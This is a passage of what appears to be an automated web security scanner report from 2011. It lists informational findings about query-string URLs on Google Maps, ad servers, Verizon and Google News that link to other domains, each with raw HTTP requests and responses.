</div> <img style="width:103px" class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="mv-dropdown"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div style="visibility:" class="dir-tm" id="travel_modes_div"> <img src="http://maps.gstatic.com/mapfiles/transparent.png" class="dir-tm-sides"/><a jsselect="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

20.98. http://maps.google.com/maps/place

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/place

Issue detail

The page was loaded from a URL containing a query string:
  • http://maps.google.com/maps/place?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d7028149978956142856\\x22
The response contains the following link to another domain:
  • http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26amp%3Bum%5C%5Cx3d1%5C%5Cx26amp%3Bie%5C%5Cx3dUTF-8%5C%5Cx26amp%3Bq%5C%5Cx3daub%5C%5Cx26amp%3Bfb%5C%5Cx3d1%5C%5Cx26amp%3Bgl%5C%5Cx3dus%5C%5Cx26amp%3Bhq%5C%5Cx3daub%5C%5Cx26amp%3Bcid%5C%5Cx3d7028149978956142856%5C%5Cx22=&sa=N&hl=en&tab=l1

Request

GET /maps/place?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d7028149978956142856\\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:41:14 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=052903314ef8577d:TM=1295908874:LM=1295908874:S=XSf7TWjb_N58vMlP; expires=Wed, 23-Jan-2013 22:41:14 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>. - Google Maps</title><script type="text/javascript"></script><script>
<!--
function e(id){return docume
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26amp%3Bum%5C%5Cx3d1%5C%5Cx26amp%3Bie%5C%5Cx3dUTF-8%5C%5Cx26amp%3Bq%5C%5Cx3daub%5C%5Cx26amp%3Bfb%5C%5Cx3d1%5C%5Cx26amp%3Bgl%5C%5Cx3dus%5C%5Cx26amp%3Bhq%5C%5Cx3daub%5C%5Cx26amp%3Bcid%5C%5Cx3d7028149978956142856%5C%5Cx22=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.99. http://maps.google.com/maps/place

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/place

Issue detail

The page was loaded from a URL containing a query string:
  • http://maps.google.com/maps/place?hl=en&um=1&ie=UTF-8&\x3den\x26um\x3d1\x26ie\x3dUTF-8\x26q\x3d\x26fb\x3d1\x26gl\x3dus\x26hq\x3d\x26hnear\x3dCambridge,+MA\x26cid\x3d
The response contains the following link to another domain:
  • http://www.youtube.com/results?hl=en&um=1&ie=UTF-8&%5Cx3den%5Cx26um%5Cx3d1%5Cx26ie%5Cx3dUTF-8%5Cx26q%5Cx3d%5Cx26fb%5Cx3d1%5Cx26gl%5Cx3dus%5Cx26hq%5Cx3d%5Cx26hnear%5Cx3dCambridge,+MA%5Cx26cid%5Cx3d=&sa=N&tab=l1

Request

GET /maps/place?hl=en&um=1&ie=UTF-8&\x3den\x26um\x3d1\x26ie\x3dUTF-8\x26q\x3d\x26fb\x3d1\x26gl\x3dus\x26hq\x3d\x26hnear\x3dCambridge,+MA\x26cid\x3d HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:41:42 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=c5d07bdbfef51812:TM=1295908902:LM=1295908902:S=vD7r0pWUMFkf-fMR; expires=Wed, 23-Jan-2013 22:41:42 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>. - Google Maps</title><script type="text/javascript"></script><script>
<!--
function e(id){return docume
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&um=1&ie=UTF-8&%5Cx3den%5Cx26um%5Cx3d1%5Cx26ie%5Cx3dUTF-8%5Cx26q%5Cx3d%5Cx26fb%5Cx3d1%5Cx26gl%5Cx3dus%5Cx26hq%5Cx3d%5Cx26hnear%5Cx3dCambridge,+MA%5Cx26cid%5Cx3d=&sa=N&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.100. http://maps.google.com/maps/place

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps/place

Issue detail

The page was loaded from a URL containing a query string:
  • http://maps.google.com/maps/place?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d7028149978956142856\\x26amp;dtab\\x3d2\\x26amp;ei\\x3diJI9TZL9IMb_lgeur7DXBg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dlocal_result\\x26amp;ct\\x3dresult\\x26amp;resnum\\x3d5\\x26amp;ved\\x3d0CEYQqgUwBA\\x22
The response contains the following link to another domain:
  • http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26amp%3Bum%5C%5Cx3d1%5C%5Cx26amp%3Bie%5C%5Cx3dUTF-8%5C%5Cx26amp%3Bq%5C%5Cx3daub%5C%5Cx26amp%3Bfb%5C%5Cx3d1%5C%5Cx26amp%3Bgl%5C%5Cx3dus%5C%5Cx26amp%3Bhq%5C%5Cx3daub%5C%5Cx26amp%3Bcid%5C%5Cx3d7028149978956142856%5C%5Cx26amp%3Bdtab%5C%5Cx3d2%5C%5Cx26amp%3Bei%5C%5Cx3diJI9TZL9IMb_lgeur7DXBg%5C%5Cx26amp%3Bsa%5C%5Cx3dX%5C%5Cx26amp%3Boi%5C%5Cx3dlocal_result%5C%5Cx26amp%3Bct%5C%5Cx3dresult%5C%5Cx26amp%3Bresnum%5C%5Cx3d5%5C%5Cx26amp%3Bved%5C%5Cx3d0CEYQqgUwBA%5C%5Cx22=&sa=N&hl=en&tab=l1

Request

GET /maps/place?hl\\x3den\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;q\\x3daub\\x26amp;fb\\x3d1\\x26amp;gl\\x3dus\\x26amp;hq\\x3daub\\x26amp;cid\\x3d7028149978956142856\\x26amp;dtab\\x3d2\\x26amp;ei\\x3diJI9TZL9IMb_lgeur7DXBg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dlocal_result\\x26amp;ct\\x3dresult\\x26amp;resnum\\x3d5\\x26amp;ved\\x3d0CEYQqgUwBA\\x22 HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:41:21 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=8fae084547919f5c:TM=1295908881:LM=1295908881:S=ebTjVFzd05-Cre3w; expires=Wed, 23-Jan-2013 22:41:21 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><title>. - Google Maps</title><script type="text/javascript"></script><script>
<!--
function e(id){return docume
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl%5C%5Cx3den%5C%5Cx26amp%3Bum%5C%5Cx3d1%5C%5Cx26amp%3Bie%5C%5Cx3dUTF-8%5C%5Cx26amp%3Bq%5C%5Cx3daub%5C%5Cx26amp%3Bfb%5C%5Cx3d1%5C%5Cx26amp%3Bgl%5C%5Cx3dus%5C%5Cx26amp%3Bhq%5C%5Cx3daub%5C%5Cx26amp%3Bcid%5C%5Cx3d7028149978956142856%5C%5Cx26amp%3Bdtab%5C%5Cx3d2%5C%5Cx26amp%3Bei%5C%5Cx3diJI9TZL9IMb_lgeur7DXBg%5C%5Cx26amp%3Bsa%5C%5Cx3dX%5C%5Cx26amp%3Boi%5C%5Cx3dlocal_result%5C%5Cx26amp%3Bct%5C%5Cx3dresult%5C%5Cx26amp%3Bresnum%5C%5Cx3d5%5C%5Cx26amp%3Bved%5C%5Cx3d0CEYQqgUwBA%5C%5Cx22=&sa=N&hl=en&tab=l1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.101. http://media.fastclick.net/w/pg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/pg

Issue detail

The page was loaded from a URL containing a query string:
  • http://media.fastclick.net/w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355
The response contains the following links to other domains:
  • https://ad.yieldmanager.com/pixel?id=938566&t=2
  • https://r.openx.net/img?pixel_id=87f68fb6efd387eabfa1cbefde1f1914
  • https://www.googleadservices.com/pagead/conversion.js
  • https://www.googleadservices.com/pagead/conversion/1032669722/?label=NDXJCKy7ngEQmpS17AM&guid=ON&script=0

Request

GET /w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=613465378701; zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=613465378701

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:49 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 929
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:49 GMT
Set-Cookie: pluto2=; domain=.fastclick.net; path=/; expires=Thu, 21-Dec-1972 00:00:00 GMT

<html><body><img alt="." src="https://r.openx.net/img?pixel_id=87f68fb6efd387eabfa1cbefde1f1914" />

<img src="https://ad.yieldmanager.com/pixel?id=938566&t=2" width="1" height="1" />

<!-- Google Code for Radio Shack URT Remarketing List -->
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1032669722/?label=NDXJCKy7ngEQmpS17AM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

20.102. http://media.fastclick.net/w/pg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/pg

Issue detail

The page was loaded from a URL containing a query string:
  • http://media.fastclick.net/w/pg?cont_id=11&d=f
The response contains the following link to another domain:
  • http://rd.apmebf.com/w/pg?cont_id=11&d=f&host=media.fastclick.net

Request

GET /w/pg?cont_id=11&d=f HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=613465378701; zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=613465378701

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 01:35:48 GMT
Location: http://rd.apmebf.com/w/pg?cont_id=11&d=f&host=media.fastclick.net
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 257
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://rd.apmebf.com/w/pg?cont_id=11&amp;d=f&amp;host=media.fastclick.net">here</a>
...[SNIP]...

20.103. http://media.fastclick.net/w/win.bid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/win.bid

Issue detail

The page was loaded from a URL containing a query string:
  • http://media.fastclick.net/w/win.bid?sid=54816&m=1&t=n&tp=5&d=f&mid=477674&EIC=1102509515205556&vch=554879014744&sys=3&evert=498003&vtid=14839&cb=1398482484&asite=2061501907&txid=9eb0b645-887a-48fe-96d9-a8ec0d65be5c&UD=CQAA7FD8nj1AEQAAAID1_gM-GQAAACBWDx8-KAAwAQ&wp=TT4pUwACvIcK5XsjKRZgBOX45riQQ1x_qFMGTg&walsh=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-foA7IBDmpvb21sYWNvZGUub3JnugEJNzI4eDkwX2FzyAEJ2gEyaHR0cDovL2pvb21sYWNvZGUub3JnL2dmL3Byb2plY3Qvam9vbWxhL3JlcG9ydGluZy-YAgrAAgTIAr23iA7gAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtxXfy71xAYmo2tqD6PMiVjHwATbrg%26client%3Dca-pub-1189370408998555%26adurl%3D
The response contains the following link to another domain:
  • http://yttrk.com/i.ashx?a=3&c=345&s1=SUB_ID

Request

GET /w/win.bid?sid=54816&m=1&t=n&tp=5&d=f&mid=477674&EIC=1102509515205556&vch=554879014744&sys=3&evert=498003&vtid=14839&cb=1398482484&asite=2061501907&txid=9eb0b645-887a-48fe-96d9-a8ec0d65be5c&UD=CQAA7FD8nj1AEQAAAID1_gM-GQAAACBWDx8-KAAwAQ&wp=TT4pUwACvIcK5XsjKRZgBOX45riQQ1x_qFMGTg&walsh=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-foA7IBDmpvb21sYWNvZGUub3JnugEJNzI4eDkwX2FzyAEJ2gEyaHR0cDovL2pvb21sYWNvZGUub3JnL2dmL3Byb2plY3Qvam9vbWxhL3JlcG9ydGluZy-YAgrAAgTIAr23iA7gAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtxXfy71xAYmo2tqD6PMiVjHwATbrg%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:37:24 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 883
Set-Cookie: pjw=BAEAAAACIAMDVCk+TSAGAQABIAMCuuoDYAcC6kkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Thu, 27-Jan-2011 01:37:24 GMT
Set-Cookie: vt=10070:256698:477674:54816:0:1295919444:3|; domain=.fastclick.net; path=/; expires=Thu, 24-Feb-2011 01:37:24 GMT
Set-Cookie: adv_ic=BwEAAABUKT5NIAYGAAFJAAAbWSAHIAsDAAAAAA==; domain=.fastclick.net; path=/; expires=Wed, 25-Jan-2012 01:37:24 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:37:24 GMT

<a href="http://media.fastclick.net/w/click.here?cid=256698&mid=477674&m=1&sid=54816&c=0&tp=5&exid=3&asite=2061501907&vtid=14839&walsh=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBhN
...[SNIP]...
</a>
<img src="http://yttrk.com/i.ashx?a=3&c=345&s1=SUB_ID" width="1" height="1" border="0" />

20.104. http://network4g.verizonwireless.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network4g.verizonwireless.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://network4g.verizonwireless.com/?cid=BAC-bsrsch
The response contains the following links to other domains:
  • http://waptag.net/ads/sites/V/verizon_4g_f/index.php
  • http://www.facebook.com/plugins/like.php?href=http://social.store.verizonwireless.com/456&layout=standard&show_faces=false&width=450&action=like&colorscheme=dark
  • http://www22.verizon.com/privacy/
  • https://ecache.vzw.com/imageFiles/Myacct/gn/css/globalnav.css
  • https://ecache.vzw.com/imageFiles/Myacct/gn/css/vzw_jquery.css
  • https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js
  • https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js
  • https://scache.vzw.com/globalnav/css/globalnav-js.css
  • https://scache.vzw.com/globalnav/globalnav.js
  • https://scache.vzw.com/scripts/accessible/mootools.js
  • https://scache.vzw.com/scripts/homepage/swfobject.js

Request

GET /?cid=BAC-bsrsch HTTP/1.1
Host: network4g.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.14
X-Pingback: http://network4g.verizonwireless.com/xmlrpc.php
X-Powered-By: ASP.NET
Date: Tue, 25 Jan 2011 14:25:23 GMT
Content-Length: 9172
Connection: close

...<!DOCTYPE html>
<html    xmlns="http://www.w3.org/1999/xhtml"
       xmlns:og="http://opengraphprotocol.org/schema/"
       xmlns:fb="http://www.facebook.com/2008/fbml" xml:lang="en" dir="ltr" lang="en-US">
...[SNIP]...
<!-- BEGIN GLOBAL NAV SCRIPTS -->    
   <link rel="stylesheet" href="https://ecache.vzw.com/imageFiles/Myacct/gn/css/vzw_jquery.css" />
   <link rel="stylesheet" href="https://ecache.vzw.com/imageFiles/Myacct/gn/css/globalnav.css" />
   <link rel="stylesheet" href="https://scache.vzw.com/globalnav/css/globalnav-js.css" />

   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->
   
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/vzw_jquery.js"></script>
   <script type="text/javascript" src="https://ecache.vzw.com/imageFiles/Myacct/gn/scripts/globalnav.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js"></script>
...[SNIP]...
<br/>
       Or can go directly to the mobile site by clicking <a href="http://waptag.net/ads/sites/V/verizon_4g_f/index.php">here</a>
...[SNIP]...
<div id="likebutton" style="visibility:hidden;top:150px;">
       <iframe src="http://www.facebook.com/plugins/like.php?href=http://social.store.verizonwireless.com/456&layout=standard&show_faces=false&width=450&action=like&colorscheme=dark" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe>
...[SNIP]...
ormation I've selected above. I also agree that I am at least 13 years of age. Verizon Wireless maintains high standards for the protection of privacy over the Internet. Your information will be kept <a href="http://www22.verizon.com/privacy/" target="_blank" style="color:#ffffff;">private</a>
...[SNIP]...

20.105. http://news.google.com/news/story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/story

Issue detail

The page was loaded from a URL containing a query string:
  • http://news.google.com/news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddy74uik5aGXiyFM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d12\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CH0QqgIwCw\\x22
The response contains the following links to other domains:
  • http://abcnews.go.com/Business/wireStory?id=12751095
  • http://abcnews.go.com/US/jared-loughner-accused-tucson-shooter-smiles-court-appearance/story?id=12750000
  • http://allafrica.com/stories/201101242014.html
  • http://arstechnica.com/gadgets/news/2011/01/report-motorola-xoom-to-launch-february-17-for-around-700.ars
  • http://arstechnica.com/web/news/2011/01/mozilla-google-take-different-approaches-to-user-tracking-opt-out.ars
  • http://business.newsfactor.com/story.xhtml?story_id=12000005I4S0
  • http://calgary.ctv.ca/servlet/an/local/CTVNews/20110123/detroit-shooting-110123/20110123/?hub=CalgaryHome
  • http://chicagobreakingbusiness.com/2011/01/cantor-declares-state-bankruptcy-law-doa.html
  • http://content.usatoday.com/communities/campusrivalry/post/2011/01/dukes-coach-k-says-chicago-bears-qb-jay-cutler-should-support-team/1
  • http://content.usatoday.com/communities/ondeadline/post/2011/01/bbc-at-least-10-killed-in-explosion-at-moscow-airport/1?csp=hf
  • http://content.usatoday.com/communities/ondeadline/post/2011/01/tucson-shooting-suspect-loughner-to-be-arraigned-shortly/1
  • http://content.usatoday.com/communities/onpolitics/post/2011/01/michele-bachmann-tea-party-sotu-response-/1
  • http://content.usatoday.com/communities/thehuddle/post/2011/01/donald-driver-super-bowl-vs-steelers-is-packers-to-lose/1
  • http://content.usatoday.com/communities/thehuddle/post/2011/01/rex-ryan-jets-have-to-learn-to-beat-more-than-just-patriots/1
  • http://dallas.sbnation.com/dallas-cowboys/2011/1/24/1953866/super-bowl-xlv-in-dallas-christina-aguilera-to-sing-national-anthem
  • http://edition.cnn.com/2011/WORLD/americas/01/24/tunisia.canada.ben.ali/
  • http://en.rian.ru/russia/20110125/162282705.html
  • http://english.aljazeera.net/news/africa/2011/01/2011124163051778391.html
  • http://english.aljazeera.net/palestinepapers/2011/01/201112412224387862.html
  • http://espn.go.com/blog/boston/new-england-patriots/post?id=4692316
  • http://espn.go.com/espn/page2/index?id=6054739
  • http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639
  • http://feeds.nytimes.com/click.phdo?i=7700bb1615b746aacc097462c73508b7

Request

GET /news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddy74uik5aGXiyFM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d12\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CH0QqgIwCw\\x22 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=tXbVq_cNPzywAPTZZZY_iHU-Yu6VsV9DeDGjtSI5YFhbo1BzBHLTePl7EksrG1xbrIHEWgP0gUcv_OLd8krfxwLB-5mr0pZdB3b_NEPQ4htVa4t8_8VKAuSjoyKeh1N5;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:14 GMT;HttpOnly
Date: Mon, 24 Jan 2011 22:43:14 GMT
Expires: Mon, 24 Jan 2011 22:43:14 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;topic=h&amp;num=3&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<span class="sel"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=ss&amp;ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;topic=w&amp;ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;cf=all&amp;ned=us&amp;geo=detect_metro_area&amp;ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
